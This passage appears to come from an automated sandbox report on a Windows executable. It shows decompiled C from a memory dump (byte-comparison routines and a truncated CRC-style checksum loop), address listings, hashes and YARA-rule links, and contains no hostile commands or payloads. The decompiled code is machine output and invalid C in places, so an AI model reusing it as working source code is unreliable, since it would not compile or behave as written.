							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}

0x004281d2
0x004281d2
0x004281d8
0x00428257
0x00428259
0x0042825b
0x00000000
0x00000000
0x00428261
0x00428267
0x004282e6
0x004282e8
0x004282ea
0x00000000
0x00000000
0x004282f0
0x004282f6
0x00428375
0x00428377
0x00428379
0x00000000
0x00000000
0x0042837f
0x00428385
0x00428404
0x00428406
0x00428408
0x00000000
0x00000000
0x0042840e
0x00428414
0x00428493
0x00428495
0x00428497
0x00000000
0x00000000
0x004284a3
0x00428523
0x00428525
0x00428527
0x00000000
0x00000000
0x0042852d
0x00428533
0x004285b2
0x004285b4
0x004285b6
0x00000000
0x00000000
0x004285c4
0x004285c6
0x004285d7
0x004285d7
0x004281cc
0x00428f28
0x00428f28
0x0042853c
0x0042853e
0x00428555
0x0042855d
0x0042855f
0x00428576
0x0042857e
0x00428580
0x00428597
0x0042859f
0x004285a1
0x004285ae
0x004285ae
0x00000000
0x004285a1
0x0042858d
0x00428591
0x00000000
0x00000000
0x00000000
0x00428591
0x0042856c
0x00428570
0x00000000
0x00000000
0x00000000
0x00428570
0x0042854b
0x0042854f
0x00000000
0x00000000
0x00000000
0x0042854f
0x004284ad
0x004284af
0x004284c6
0x004284ce
0x004284d0
0x004284e7
0x004284ef
0x004284f1
0x00428508
0x00428510
0x00428512
0x0042851f
0x0042851f
0x00000000
0x00428512
0x004284fe
0x00428502
0x00000000
0x00000000
0x00000000
0x00428502
0x004284dd
0x004284e1
0x00000000
0x00000000
0x00000000
0x004284e1
0x004284bc
0x004284c0
0x00000000
0x00000000
0x00000000
0x004284c0
0x0042841d
0x0042841f
0x00428436
0x0042843e
0x00428440
0x00428457
0x0042845f
0x00428461
0x00428478
0x00428480
0x00428482
0x0042848f
0x0042848f
0x00000000
0x00428482
0x0042846e
0x00428472
0x00000000
0x00000000
0x00000000
0x00428472
0x0042844d
0x00428451
0x00000000
0x00000000
0x00000000
0x00428451
0x0042842c
0x00428430
0x00000000
0x00000000
0x00000000
0x00428430
0x0042838e
0x00428390
0x004283a7
0x004283af
0x004283b1
0x004283c8
0x004283d0
0x004283d2
0x004283e9
0x004283f1
0x004283f3
0x00428400
0x00428400
0x00000000
0x004283f3
0x004283df
0x004283e3
0x00000000
0x00000000
0x00000000
0x004283e3
0x004283be
0x004283c2
0x00000000
0x00000000
0x00000000
0x004283c2
0x0042839d
0x004283a1
0x00000000
0x00000000
0x00000000
0x004283a1
0x004282ff
0x00428301
0x00428318
0x00428320
0x00428322
0x00428339
0x00428341
0x00428343
0x0042835a
0x00428362
0x00428364
0x00428371
0x00428371
0x00000000
0x00428364
0x00428350
0x00428354
0x00000000
0x00000000
0x00000000
0x00428354
0x0042832f
0x00428333
0x00000000
0x00000000
0x00000000
0x00428333
0x0042830e
0x00428312
0x00000000
0x00000000
0x00000000
0x00428312
0x00428270
0x00428272
0x00428289
0x00428291
0x00428293
0x004282aa
0x004282b2
0x004282b4
0x004282cb
0x004282d3
0x004282d5
0x004282e2
0x004282e2
0x00000000
0x004282d5
0x004282c1
0x004282c5
0x00000000
0x00000000
0x00000000
0x004282c5
0x004282a0
0x004282a4
0x00000000
0x00000000
0x00000000
0x004282a4
0x0042827f
0x00428283
0x00000000
0x00000000
0x00000000
0x004281da
0x004281da
0x004281dd
0x004281e1
0x004281e3
0x004281fa
0x004281fa
0x004281fe
0x00428202
0x00428204
0x0042821b
0x0042821b
0x0042821f
0x00428223
0x00428225
0x0042823c
0x0042823c
0x00428240
0x00428244
0x00428246
0x0042824c
0x0042824f
0x00428253
0x00428253
0x00000000
0x00428246
0x0042822b
0x0042822e
0x00428232
0x00428236
0x00000000
0x00000000
0x00000000
0x00428236
0x0042820a
0x0042820d
0x00428211
0x00428215
0x00000000
0x00000000
0x00000000
0x00428215
0x004281e9
0x004281ec
0x004281f0
0x004281f4
0x00000000
0x00000000
0x00000000
0x004281f4
0x00427df7
0x00427df7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 329fa79d50247c4852b4ed1f015c2e91b5c5b0a5f1d555742ebc80d7ec9320da
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 6DC18A73E1F9F34A8736812D606863FEA626FD165039EC3E6CCD42F789992A9C0085D4

Uniqueness

Uniqueness Score: -1.00%

Function 00427DFE, Relevance: .4, Instructions: 351
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00427DFE(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}

0x00427dfe
0x00427dfe
0x00427e04
0x00427e77
0x00427e79
0x00427e7b
0x00000000
0x00000000
0x00427e81
0x00427e87
0x00427f06
0x00427f08
0x00427f0a
0x00000000
0x00000000
0x00427f10
0x00427f16
0x00427f95
0x00427f97
0x00427f99
0x00000000
0x00000000
0x00427f9f
0x00427fa5
0x00428024
0x00428026
0x00428028
0x00000000
0x00000000
0x00428034
0x004280b4
0x004280b6
0x004280b8
0x00000000
0x00000000
0x004280be
0x004280c4
0x00428143
0x00428145
0x00428147
0x00000000
0x00000000
0x0042814d
0x00428153
0x004281c4
0x004281c6
0x004281c8
0x004281ca
0x004281ca
0x004281cc
0x00428f28
0x00428f28
0x0042815c
0x0042815e
0x0042816f
0x00428177
0x00428179
0x0042818a
0x00428192
0x00428194
0x004281a9
0x004281b1
0x004281b3
0x004281c0
0x004281c0
0x00000000
0x004281b3
0x0042819d
0x004281a3
0x00000000
0x00000000
0x004281a5
0x004281a5
0x00000000
0x004281a5
0x00428182
0x00428188
0x00000000
0x00000000
0x00000000
0x00428188
0x00428167
0x0042816d
0x00000000
0x00000000
0x00000000
0x0042816d
0x004280cd
0x004280cf
0x004280e6
0x004280ee
0x004280f0
0x00428107
0x0042810f
0x00428111
0x00428128
0x00428130
0x00428132
0x0042813f
0x0042813f
0x00000000
0x00428132
0x0042811e
0x00428122
0x00000000
0x00000000
0x00000000
0x00428122
0x004280fd
0x00428101
0x00000000
0x00000000
0x00000000
0x00428101
0x004280dc
0x004280e0
0x00000000
0x00000000
0x00000000
0x004280e0
0x0042803e
0x00428040
0x00428057
0x0042805f
0x00428061
0x00428078
0x00428080
0x00428082
0x00428099
0x004280a1
0x004280a3
0x004280b0
0x004280b0
0x00000000
0x004280a3
0x0042808f
0x00428093
0x00000000
0x00000000
0x00000000
0x00428093
0x0042806e
0x00428072
0x00000000
0x00000000
0x00000000
0x00428072
0x0042804d
0x00428051
0x00000000
0x00000000
0x00000000
0x00428051
0x00427fae
0x00427fb0
0x00427fc7
0x00427fcf
0x00427fd1
0x00427fe8
0x00427ff0
0x00427ff2
0x00428009
0x00428011
0x00428013
0x00428020
0x00428020
0x00000000
0x00428013
0x00427fff
0x00428003
0x00000000
0x00000000
0x00000000
0x00428003
0x00427fde
0x00427fe2
0x00000000
0x00000000
0x00000000
0x00427fe2
0x00427fbd
0x00427fc1
0x00000000
0x00000000
0x00000000
0x00427fc1
0x00427f1f
0x00427f21
0x00427f38
0x00427f40
0x00427f42
0x00427f59
0x00427f61
0x00427f63
0x00427f7a
0x00427f82
0x00427f84
0x00427f91
0x00427f91
0x00000000
0x00427f84
0x00427f70
0x00427f74
0x00000000
0x00000000
0x00000000
0x00427f74
0x00427f4f
0x00427f53
0x00000000
0x00000000
0x00000000
0x00427f53
0x00427f2e
0x00427f32
0x00000000
0x00000000
0x00000000
0x00427f32
0x00427e90
0x00427e92
0x00427ea9
0x00427eb1
0x00427eb3
0x00427eca
0x00427ed2
0x00427ed4
0x00427eeb
0x00427ef3
0x00427ef5
0x00427f02
0x00427f02
0x00000000
0x00427ef5
0x00427ee1
0x00427ee5
0x00000000
0x00000000
0x00000000
0x00427ee5
0x00427ec0
0x00427ec4
0x00000000
0x00000000
0x00000000
0x00427ec4
0x00427e9f
0x00427ea3
0x00000000
0x00000000
0x00000000
0x00427e06
0x00427e06
0x00427e09
0x00427e0d
0x00427e0f
0x00427e22
0x00427e22
0x00427e26
0x00427e2a
0x00427e2c
0x00427e3f
0x00427e3f
0x00427e43
0x00427e47
0x00427e49
0x00427e5c
0x00427e5c
0x00427e60
0x00427e64
0x00427e66
0x00427e6c
0x00427e6f
0x00427e73
0x00427e73
0x00000000
0x00427e66
0x00427e4f
0x00427e52
0x00427e56
0x00427e5a
0x00000000
0x00000000
0x00000000
0x00427e5a
0x00427e32
0x00427e35
0x00427e39
0x00427e3d
0x00000000
0x00000000
0x00000000
0x00427e3d
0x00427e15
0x00427e18
0x00427e1c
0x00427e20
0x00000000
0x00000000
0x00000000
0x00427e20
0x00427df7
0x00427df7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: b976aad2bc3781cc5b997c0cd0122d9f614b4a26d48a0645d0fe43cee9e2042e
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 97C18B73E1F9F30A8735812D646863FEA626FD165039FC3E6CC902F389DA2A9D1581D4

Uniqueness

Uniqueness Score: -1.00%

Function 004074B0, Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004074B0(unsigned int __eax, signed char* __ecx, signed int __edx) {
				signed int _t45;
				signed char* _t49;
				signed char* _t50;
				signed char* _t51;
				signed char* _t52;
				signed char* _t53;
				signed char* _t54;
				signed char* _t55;
				unsigned int _t82;
				signed int _t84;
				unsigned int _t88;

				_t49 = __ecx;
				_t82 = __eax;
				if(__ecx != 0) {
					_t84 =  !__edx;
					if(__eax >= 8) {
						_t88 = __eax >> 3;
						do {
							_t50 =  &(_t49[1]);
							_t51 =  &(_t50[1]);
							_t52 =  &(_t51[1]);
							_t53 =  &(_t52[1]);
							_t54 =  &(_t53[1]);
							_t55 =  &(_t54[1]);
							_t45 = ((((((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t52[1] & 0x000000ff ^ (((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t53[1] & 0x000000ff ^ ((((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 